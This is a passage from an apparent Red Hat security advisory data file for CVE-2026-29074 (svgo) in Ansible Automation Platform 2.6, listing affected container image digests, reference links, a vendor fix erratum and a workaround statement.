"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3c83b77b1291ae9e3003b1eb16bcd1b21752733d5ea0b7f9193bea2ba9302215_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6d333bdef78bef7ba85b04a1a6c5d33591263371b5f740813efae68788e32a6c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:86ac843a55e47fa052c11f263a0ebf4f0c969cf5f60f62a5b88006c963f5b772_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:b77fba98853eb0fabcbcd4981c347cf909f50e64ea32f4c0d8313d89cdb48cf7_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:094676fb53084cc7ca93010b2667fde26a83c78bd84af7dfef86e27149fc2385_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:1ba54fa91703c8105080e534a74b85b257c0123abb87d9aa4c05f05e32c24c9b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21582b96b79a5a1800ce288633970ed7303655e31a202993df84159d3dca7826_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:d6adc9bd2df9fded6228ddd5dbca3919991913b40fb95b12d4d01cf96c5f4d60_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-29074"
},
{
"category": "external",
"summary": "RHBZ#2445132",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445132"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-29074",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-29074"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-29074",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29074"
},
{
"category": "external",
"summary": "https://github.com/svg/svgo/security/advisories/GHSA-xpqw-6gx7-v673",
"url": "https://github.com/svg/svgo/security/advisories/GHSA-xpqw-6gx7-v673"
}
],
"release_date": "2026-03-06T07:23:05.716000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-31T23:31:56+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6309"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3c83b77b1291ae9e3003b1eb16bcd1b21752733d5ea0b7f9193bea2ba9302215_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6d333bdef78bef7ba85b04a1a6c5d33591263371b5f740813efae68788e32a6c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:86ac843a55e47fa052c11f263a0ebf4f0c969cf5f60f62a5b88006c963f5b772_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:b77fba98853eb0fabcbcd4981c347cf909f50e64ea32f4c0d8313d89cdb48cf7_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:094676fb53084cc7ca93010b2667fde26a83c78bd84af7dfef86e27149fc2385_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:1ba54fa91703c8105080e534a74b85b257c0123abb87d9aa4c05f05e32c24c9b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21582b96b79a5a1800ce288633970ed7303655e31a202993df84159d3dca7826_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:d6adc9bd2df9fded6228ddd5dbca3919991913b40fb95b12d4d01cf96c5f4d60_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
